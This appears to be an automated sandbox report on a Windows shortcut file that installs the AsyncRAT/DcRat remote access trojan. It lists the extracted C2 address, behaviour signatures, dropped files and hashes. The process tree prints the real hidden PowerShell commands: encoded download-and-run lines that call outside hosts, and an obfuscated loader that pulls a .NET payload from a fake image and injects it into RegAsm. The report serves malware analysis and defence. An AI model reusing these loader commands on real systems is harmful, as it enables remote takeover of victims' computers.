Analysis

  • max time kernel
    147s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/11/2024, 15:37

General

  • Target

    d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa.lnk

  • Size

    2KB

  • MD5

    5358d8d8fe485972eb8115f7daf16080

  • SHA1

    245e93bc84a9e8635732a8b9a9ed2e906a09f1c0

  • SHA256

    d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa

  • SHA512

    5808ab33e81962bc5252022357a2906651a84ad1cdcf007e5b21d0eb9ff1f08c9fde44d186a18c64e06e8c3ccb6b751de000e1877922dccb8cf7e6cc7996bf74

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

103.125.189.155:8848

Mutex

DcRatMutex_adxzvxv

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5112
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cMD /c POwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1360
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c POwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1340
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2140
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\INTEL02.bat""
            5⤵
            • Drops startup file
            • Suspicious use of WriteProcessMemory
            PID:1624
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic cpu get name
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:100
            • C:\Windows\system32\find.exe
              find "QEMU"
              6⤵
                PID:1696
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#Z#By#DM#N#B3#Gc#Z#Bz#GY#ZwBz#C8#ZgBz#GQ#ZgBz#GQ#cw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#d#Bl#HM#d#Bf#Gk#bQBn#C4#agBw#Gc#Pw#x#DQ#N##x#Dc#Jw#s#C##JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GQ#YQBy#Gs#bQBh#G4#YQBn#GU#cg#v#GQ#YQBy#Gs#bw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#d#Bl#HM#d#Bf#Gk#bQBn#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#Go#YQBm#GI#c#BT#Gs#Lw#y#DY#Lg#y#D##MQ#u#D##Mg#u#DM#M##x#C8#Lw#6#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe $OWjuxD"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4840
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hdr34wgdsfgs/fsdfsds/downloads/test_img.jpg?14417', 'https://bitbucket.org/darkmanager/darko/downloads/test_img.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.jafbpSk/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"
                  7⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4588
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:224
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                pOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5028
                • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\donhang.docx" /o ""
                  7⤵
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious use of SetWindowsHookEx
                  PID:3296

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      f41839a3fe2888c8b3050197bc9a0a05

      SHA1

      0798941aaf7a53a11ea9ed589752890aee069729

      SHA256

      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

      SHA512

      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      1a11402783a8686e08f8fa987dd07bca

      SHA1

      580df3865059f4e2d8be10644590317336d146ce

      SHA256

      9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

      SHA512

      5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      a2b24af1492f112d2e53cb7415fda39f

      SHA1

      dbfcee57242a14b60997bd03379cc60198976d85

      SHA256

      fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

      SHA512

      9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

    • C:\Users\Admin\AppData\Local\Temp\TCD5B9.tmp\gb.xsl

      Filesize

      262KB

      MD5

      51d32ee5bc7ab811041f799652d26e04

      SHA1

      412193006aa3ef19e0a57e16acf86b830993024a

      SHA256

      6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

      SHA512

      5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2vlwvn0a.dfe.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\INTEL02.bat

      Filesize

      14KB

      MD5

      7d4fd0768b8cba2af39bf88ba789e27a

      SHA1

      31315e8bc69d8ff9d3764071b0c9def830dabf58

      SHA256

      bac0b67b6a6ffaea1aa1cd97802e9e7f45f6ab68f60dc4ebd71f943848530838

      SHA512

      101971fafe90fa9e703bb4d62208f984fe3162044bf30b2ed16f5cd9dc16d2e9a9770fccd37cfee3796b4f222035418dc0ab79df1a99faeb385889341972c754

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

      Filesize

      266B

      MD5

      86493b936f7da8c56ca1aa58bb7a7e9a

      SHA1

      fc7cae515fde493541be88881c285d712db7212c

      SHA256

      4d6282ece4e6047126c782e717ddd21adbb311412b9ac8ce65c4e3650871a47d

      SHA512

      58b37f2dbf86e9754df24df81b37ab4336459f47b24cb39457e7c0097e9c3e9ded43cdb3d0517944f5d7022750f1fe5d29e44054982c5dbedadf1a8e8c8cf859

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

      Filesize

      684B

      MD5

      f503b3b384c5bd135f5a190d720f198b

      SHA1

      3056a2c90ac0acb51e030e355d1a6cb6557ea766

      SHA256

      5e1938be5ff643525fb28ae0e8118d88dc34fe60745447fa1af2575dfb2e449f

      SHA512

      29fbd1260a67c2e3b36e3c9d7608ec79ca5caa759688234a23f2c9ebb88bfa8e81f7984f82abd806c360097be16764faf10bd6f8c2d8242ba3cdd426aa48c0c3

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

      Filesize

      1KB

      MD5

      9055dde56adc3490f91b8446684aa69a

      SHA1

      8df9f63b4290c52bdda40ad376b2910b4b85fb29

      SHA256

      53033b1796646896f00b287d700ba51170ad2d4456527975ffd12eb39603a1fc

      SHA512

      ecb76ab8fbfaacf81e39e9ab352f9a92dbf5d94d879609a5c40407410cb6fd7ac0326f77f2938047f9e7bfe5a75acdb270e3d78956c353ec2b0b7a0dab017025

    • C:\Users\Admin\AppData\Roaming\donhang.docx

      Filesize

      12KB

      MD5

      ff3620557b65e6e8dd8816643d785c5a

      SHA1

      d5021480b7cac2066462829c53dc18615642c579

      SHA256

      85225d3c39423bbfc05e9d52351a9b00670fee3565457e5c3f75caac27ca4de9

      SHA512

      c2a842bfa4f3caf50d58d5707ca0ad978e04e5111fe20ad468282c216567d25da7022fb7ff2681cb72acc8add3cbcf37000b6bde06ad252758f6ff06c9fb3d34

    • memory/224-115-0x0000000005240000-0x00000000052A6000-memory.dmp

      Filesize

      408KB

    • memory/224-48-0x0000000000400000-0x0000000000412000-memory.dmp

      Filesize

      72KB

    • memory/224-113-0x0000000005130000-0x00000000051CC000-memory.dmp

      Filesize

      624KB

    • memory/224-114-0x0000000005780000-0x0000000005D24000-memory.dmp

      Filesize

      5.6MB

    • memory/1360-46-0x00007FFE30330000-0x00007FFE30DF1000-memory.dmp

      Filesize

      10.8MB

    • memory/1360-2-0x00007FFE30333000-0x00007FFE30335000-memory.dmp

      Filesize

      8KB

    • memory/1360-12-0x0000019CB2F60000-0x0000019CB2F82000-memory.dmp

      Filesize

      136KB

    • memory/1360-80-0x00007FFE30330000-0x00007FFE30DF1000-memory.dmp

      Filesize

      10.8MB

    • memory/1360-13-0x00007FFE30330000-0x00007FFE30DF1000-memory.dmp

      Filesize

      10.8MB

    • memory/1360-14-0x00007FFE30330000-0x00007FFE30DF1000-memory.dmp

      Filesize

      10.8MB

    • memory/1360-45-0x00007FFE30333000-0x00007FFE30335000-memory.dmp

      Filesize

      8KB

    • memory/3296-81-0x00007FFE0C820000-0x00007FFE0C830000-memory.dmp

      Filesize

      64KB

    • memory/3296-71-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

      Filesize

      64KB

    • memory/3296-73-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

      Filesize

      64KB

    • memory/3296-72-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

      Filesize

      64KB

    • memory/3296-82-0x00007FFE0C820000-0x00007FFE0C830000-memory.dmp

      Filesize

      64KB

    • memory/3296-74-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

      Filesize

      64KB

    • memory/3296-75-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

      Filesize

      64KB

    • memory/4588-47-0x000001D378EC0000-0x000001D378F02000-memory.dmp

      Filesize

      264KB